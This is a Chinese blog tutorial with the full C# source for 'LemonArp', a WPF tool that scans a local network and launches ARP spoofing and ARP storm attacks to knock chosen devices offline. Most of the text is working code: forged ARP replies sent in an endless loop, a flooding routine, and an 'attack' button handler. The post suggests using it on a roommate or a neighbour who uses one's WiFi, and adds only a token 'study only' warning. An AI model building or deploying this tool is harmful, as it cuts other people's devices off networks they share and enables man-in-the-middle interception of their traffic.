首页 > 代码库 > “HK”的日常之ARP断网攻击

“HK”的日常之ARP断网攻击

ARP断网攻击是什么?可以吃吗?如果可以吃它好吃吗?

ARP断网攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

那就是不可以吃咯?

!???!??!?!?!

它可以做什么?可不可以吃呢?

可以应用于很多方面,例如你有一个占用的网速的室友或蹭WIFI的邻居。

警告:本教程仅作为学习研究,禁止其他用途!

---富强、民主、文明、和谐, 自由、平等、公正、法治, 爱国、敬业、诚信、友善---

     进入正题,喵

一、配置开发环境

1.首先需要安装Winpcap,https://www.winpcap.org/install/

2.建立一只WPF项目(C#也可以)

3.我们需要导入2只DLL,待会在下面会有下载链接。

技术分享

 

二、配置界面

大概像酱紫:
技术分享技术分享

界面和背景图

二、编码

首先我们需要一些帮助类:

(ArpTools.cs)

技术分享
using PacketDotNet;
using SharpPcap;
using SharpPcap.LibPcap;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

namespace LemonArp
{
    class ArpTool
    {
        public event EventHandler<ResolvedEventArgs> ResolvedEvent;
        public event EventHandler<EventArgs> ScanStopedEvent;

        private LibPcapLiveDevice _device;
        private TimeSpan timeout = new TimeSpan(0, 0, 1);
        private System.Threading.Thread scanThread = null;
        private System.Threading.Thread arpSpoofingThread = null;
      public ArpTool(LibPcapLiveDevice device)
        {
            _device = device;

            foreach (var address in _device.Addresses)
            {
                if (address.Addr.type == Sockaddr.AddressTypes.AF_INET_AF_INET6)
                {
                    if (address.Addr.ipAddress.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
                    {
                        LocalIP = address.Addr.ipAddress;
                        break; 
                    }
                }
            }

            foreach (var address in device.Addresses)
            {
                if (address.Addr.type == SharpPcap.LibPcap.Sockaddr.AddressTypes.HARDWARE)
                {
                    LocalMAC = address.Addr.hardwareAddress; 
                }
            }

            GetwayIP = _device.Interface.GatewayAddress; 
            GetwayMAC = Resolve(GetwayIP); 
        }

        public IPAddress LocalIP { get; private set; }

        public IPAddress GetwayIP { get; private set; }

        public PhysicalAddress LocalMAC { get; private set; }

        public PhysicalAddress GetwayMAC { get; private set; }

        public void ScanLAN(IP startIP, IP endIP)
        {
            var targetIPList = new List<IPAddress>();
            while (!startIP.Equals(endIP))
            {
                targetIPList.Add(startIP.IPAddress);
                startIP.AddOne();
            }

            var arpPackets = new Packet[targetIPList.Count];
            for (int i = 0; i < arpPackets.Length; ++i)
            {
                arpPackets[i] = BuildRequest(targetIPList[i], LocalMAC, LocalIP);
            }
            String arpFilter = "arp and ether dst " + LocalMAC.ToString();
            _device.Open(DeviceMode.Promiscuous, 20);
            _device.Filter = arpFilter;

            scanThread = new System.Threading.Thread(() =>
            {
                for (int i = 0; i < arpPackets.Length; ++i)
                {
                    var lastRequestTime = DateTime.FromBinary(0);
                    var requestInterval = new TimeSpan(0, 0, 1);
                    var timeoutDateTime = DateTime.Now + timeout;
                    while (DateTime.Now < timeoutDateTime)
                    {
                        if (requestInterval < (DateTime.Now - lastRequestTime))
                        {
                            _device.SendPacket(arpPackets[i]);
                            lastRequestTime = DateTime.Now;
                        }
                        var reply = _device.GetNextPacket();
                        if (reply == null)
                        {
                            continue;
                        }
                        var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data);

                        var arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
                        if (arpPacket == null)
                        {
                            continue;
                        }
                        if (arpPacket.SenderProtocolAddress.Equals(targetIPList[i]))
                        {
                            if (ResolvedEvent != null)
                            {
                                ResolvedEvent(this, new ResolvedEventArgs()
                                {
                                    IPAddress = arpPacket.SenderProtocolAddress,
                                    PhysicalAddress = arpPacket.SenderHardwareAddress
                                });
                            }
                            break;
                        }
                    }
                }
                _device.Close();
                Console.WriteLine("exit scan");
                if (ScanStopedEvent != null)
                {
                    ScanStopedEvent(this, new EventArgs());
                }
            });
            scanThread.Start();
        }

        public void StopScanLan()
        {
            if (scanThread != null && scanThread.ThreadState == System.Threading.ThreadState.Running)
            {
                scanThread.Abort();
                if (_device.Opened) _device.Close();
            }
        }

        public PhysicalAddress Resolve(IPAddress destIP)
        {
            var request = BuildRequest(destIP, LocalMAC, LocalIP);
            String arpFilter = "arp and ether dst " + LocalMAC.ToString();
            _device.Open(DeviceMode.Promiscuous, 20);
            _device.Filter = arpFilter;
            var lastRequestTime = DateTime.FromBinary(0);

            var requestInterval = new TimeSpan(0, 0, 1);

            PacketDotNet.ARPPacket arpPacket = null;
            var timeoutDateTime = DateTime.Now + timeout;
            while (DateTime.Now < timeoutDateTime)
            {
                if (requestInterval < (DateTime.Now - lastRequestTime))
                {
                    _device.SendPacket(request);
                    lastRequestTime = DateTime.Now;
                }
                var reply = _device.GetNextPacket();
                if (reply == null)
                {
                    continue;
                }

                var packet = PacketDotNet.Packet.ParsePacket(reply.LinkLayerType, reply.Data);

                arpPacket = PacketDotNet.ARPPacket.GetEncapsulated(packet);
                if (arpPacket == null)
                {
                    continue;
                }
                if (arpPacket.SenderProtocolAddress.Equals(destIP))
                {
                    break;
                }
            }

            _device.Close();

            if (DateTime.Now >= timeoutDateTime)
            {
                return null;
            }
            else
            {
                return arpPacket.SenderHardwareAddress;
            }
        }

        public void ARPStorm(List<IPAddress> requestIPList)
        {
            d = 0;
            List<Packet> packetList = new List<Packet>();
            foreach (var ip in requestIPList)
            {
                var packet = BuildRequest(ip, LocalMAC, LocalIP);
                packetList.Add(packet);
            }

            StopARPSpoofing();
            _device.Open(DeviceMode.Promiscuous, 20);
            arpSpoofingThread = new System.Threading.Thread(() =>
            {
                while (true)
                {
                    foreach (var packet in packetList)
                    {
                        _device.SendPacket(packet);
                        System.Threading.Thread.Sleep(50);
                        d++;
                    }
                }
            });
            arpSpoofingThread.IsBackground = true;
            arpSpoofingThread.Start();
        }

        public void ARPSpoofing1(IPAddress destIP, PhysicalAddress MAC)
        {
            var packet = BuildResponse(GetwayIP, GetwayMAC, destIP, LocalMAC);
            Console.WriteLine("start arp spoofing 1, dest ip {0}", destIP);
            StartARPSpoofing(packet);
        }
        public void ARPSpoofing2(IPAddress destIP, PhysicalAddress destMac, PhysicalAddress wrongMAC = null)
        {
            if (wrongMAC == null)
            {
                wrongMAC = GetRandomPhysicalAddress();
            }
            var packet = BuildResponse(destIP, destMac, GetwayIP, wrongMAC);
            Console.WriteLine("start arp spoofing 2, dest ip {0}, dest mac {1}, getway ip {2}, getwaymac {3}",
                               destIP, destMac, GetwayIP, wrongMAC);
            StartARPSpoofing(packet);
        }

        public void StopARPSpoofing()
        {
            if (arpSpoofingThread != null && arpSpoofingThread.ThreadState != System.Threading.ThreadState.Unstarted)
            {
                arpSpoofingThread.Abort();
                if (_device.Opened)
                    _device.Close();
                Console.WriteLine("stop arp spoofing");
            }
        }
        public int d = 0;
        private void StartARPSpoofing(Packet packet)
        {
            d = 0;
            StopARPSpoofing();
            _device.Open(DeviceMode.Promiscuous, 20);
            arpSpoofingThread = new System.Threading.Thread(() =>
            {
                while (true)
                {
                    _device.SendPacket(packet);
                    Thread.Sleep(50);
                    d++;
                }
            });
            arpSpoofingThread.IsBackground = true;
            arpSpoofingThread.Start();
        }

        private PhysicalAddress GetRandomPhysicalAddress()
        {
            Random random = new Random(Environment.TickCount);
            byte[] macBytes = new byte[] { 0x9C, 0x21, 0x6A, 0xC3, 0xB0, 0x27 };
            macBytes[5] = (byte)random.Next(255);
            Console.WriteLine(new PhysicalAddress(macBytes));
            return new PhysicalAddress(macBytes);
        }

        private Packet BuildResponse(IPAddress destIP, PhysicalAddress destMac, IPAddress senderIP, PhysicalAddress senderMac)
        {
            var ethernetPacket = new EthernetPacket(senderMac, destMac, EthernetPacketType.Arp);
            var arpPacket = new ARPPacket(ARPOperation.Response, destMac, destIP, senderMac, senderIP);
            ethernetPacket.PayloadPacket = arpPacket;

            return ethernetPacket;
        }

        private Packet BuildRequest(IPAddress destinationIP, PhysicalAddress localMac, IPAddress localIP)
        {
            var ethernetPacket = new EthernetPacket(localMac,
                                                    PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF"),
                                                    PacketDotNet.EthernetPacketType.Arp);
            var arpPacket = new ARPPacket(PacketDotNet.ARPOperation.Request,
                                          PhysicalAddress.Parse("00-00-00-00-00-00"),
                                          destinationIP,
                                          localMac,
                                          localIP);
            ethernetPacket.PayloadPacket = arpPacket;

            return ethernetPacket;
        }
    }
}
View Code

(IP.cs)

技术分享
 1 using System;
 2 using System.Collections.Generic;
 3 using System.Linq;
 4 using System.Net;
 5 using System.Text;
 6 
 7 namespace LemonArp
 8 {
 9     class IP
10     {
11         public byte[] IPBytes { get; private set; }
12 
13         public IPAddress IPAddress
14         {
15             get
16             {
17                 return new IPAddress(IPBytes);
18             }
19         }
20 
21         public IP(IPAddress ip)
22         {
23             IPBytes = ip.GetAddressBytes();
24         }
25 
26         public void AddOne()
27         {
28             int i = 3;
29             while (i >= 0)
30             {
31                 if (IPBytes[i] == 255)
32                 {
33                     IPBytes[i] = 0;
34                     i--;
35                 }
36                 else
37                 {
38                     IPBytes[i]++;
39                     break;
40                 }
41             }
42         }
43 
44         public override bool Equals(object obj)
45         {
46             var ip = obj as IP;
47             for (int i = 0; i < IPBytes.Length; ++i)
48             {
49                 if (ip.IPBytes[i] != IPBytes[i])
50                     return false;
51             }
52 
53             return true;
54         }
55 
56         public override int GetHashCode()
57         {
58             return base.GetHashCode();
59         }
60 
61         public bool SmallerThan(IP ip)
62         {
63             for (int i = 0; i < IPBytes.Length; ++i)
64             {
65                 if (IPBytes[i] < ip.IPBytes[i])
66                     return true;
67             }
68             return false;
69         }
70     }
71 }
View Code

(ResolvedEventArgs.cs)

技术分享
1 namespace LemonArp
2 {
3     class ResolvedEventArgs:EventArgs
4     {
5         public IPAddress IPAddress { get; set; }
6 
7         public PhysicalAddress PhysicalAddress { get; set; }
8     }
9 }
View Code

接着,我们需要定义一些字段,帮助我们使用这些类

技术分享
1         System.Windows.Forms.Timer timer1 = new System.Windows.Forms.Timer();
2 
3         private LibPcapLiveDeviceList deviceList;
4 
5         private ArpTool arpTool = null;
6 
7         private List<Tuple<IPAddress, PhysicalAddress>> IPMACMapList;
View Code

Timer你可以使用其他的,但属性就不同了。

在窗口的构造函数中,我们先设定好他们

技术分享
1             IPMACMapList = new List<Tuple<IPAddress, PhysicalAddress>>();
2             timer1.Interval = 1000;
3             timer1.Tick += delegate {tit.Text = "攻击次数:" + arpTool.d; };
View Code

当窗口加载完成时,我们需要为接下来的ARP攻击做准备:扫描可用的网卡设备

技术分享
 1             deviceList = LibPcapLiveDeviceList.Instance;
 2 
 3             if (deviceList.Count < 1)
 4             {
 5                 throw new Exception("没有发现本机上的网络设备");
 6             }
 7 
 8             foreach (var device in deviceList)
 9             {
10                 try
11                 {
12                     arpTool = new ArpTool(device);
13                     arpTool.ScanStopedEvent += delegate { this.Dispatcher.BeginInvoke(new Action(async delegate { tit.Text = "IP扫描完成"; await Task.Delay(3000); tit.Text = "请选择要攻击的IP"; sra.Text = "搜索"; })); };
14                     arpTool.ResolvedEvent += arpTool_ResolvedEvent;
15                     tit.Text = "网关IP: " + arpTool.GetwayIP + "  本地IP: " + arpTool.LocalIP;
16                     stip .Text =clip.Text = arpTool.GetwayIP.ToString();
17                     if (arpTool.GetwayIP.ToString() != "")
18                         return;
19                 }
20                 catch { }
21             }
View Code

和一只处理搜索结果的事件:

技术分享
1         private void arpTool_ResolvedEvent(object sender, ResolvedEventArgs e)
2         {
3             IPMACMapList.Add(new Tuple<IPAddress, PhysicalAddress>(e.IPAddress, e.PhysicalAddress));
4             this.Dispatcher.BeginInvoke(new Action(delegate { dt.Items.Add(new ListBoxItem() { Content = $"{e.IPAddress}  -  {e.PhysicalAddress}", ToolTip = e.IPAddress }); }));
5         }
View Code

准备工作快要完成了,我们需要在局域网中查找可用的设备,只要是连接到你的WIFI的设备

技术分享
 1             if (sra.Text == "搜索")
 2             {
 3                 IPAddress startIP, endIP;
 4                 if (!IPAddress.TryParse(stip.Text, out startIP) || !IPAddress.TryParse(clip.Text, out endIP))
 5                 {
 6                     tit.Text = "不正确的IP地址";
 7                     return;
 8                 }
 9 
10                 IP start = new IP(startIP);
11                 IP end = new IP(endIP);
12                 if (end.SmallerThan(start))
13                 {
14                     tit.Text = "开始地址大于结束地址";
15                     return;
16                 }
17 
18                 sra.Text = "停止";
19                 IPMACMapList.Clear();
20                 dt.Items.Clear();
21                 arpTool.ScanLAN(start, end);
22             }
23             else
24             {
25                 arpTool.StopScanLan();
26                 sra.Text = "搜索";
27             }
View Code

接下要响应当你选中搜索到的设备时发生的事件

技术分享
1         private void dt_SelectionChanged(object sender, SelectionChangedEventArgs e)
2         {
3             if (dt.SelectedIndex != -1)
4                 dtip.Text = (dt.SelectedItem as ListBoxItem).ToolTip.ToString();
5         }
View Code

准备工作完成,接下来可以发送ARP攻击报文了:

技术分享
 1                 if (but.Text == "攻击")
 2                 {
 3                     if (dtip.Text != "")
 4                     {
 5                         timer1.Start();
 6                         var destIP = IPMACMapList[dt.SelectedIndex].Item1;
 7                         var destMAC = IPMACMapList[dt.SelectedIndex].Item2;
 8                         arpTool.ARPSpoofing1(destIP, destMAC);
 9                         but.Text = "停止";
10                     }
11                     else { tit.Text = "请选择一只你要攻击的IP"; }
12                 }
13                 else
14                 {
15                     timer1.Stop();
16                     arpTool.StopARPSpoofing();
17                     but.Text = "攻击";
18                 }
View Code

 

三、测试

接下来有请,额,我的 ..um..手机上场

技术分享

攻击中。。。突突突

然后嘞,手机废了,QAQ

 

开源地址:https://github.com/TwilightLemon/LemonArp

“HK”的日常之ARP断网攻击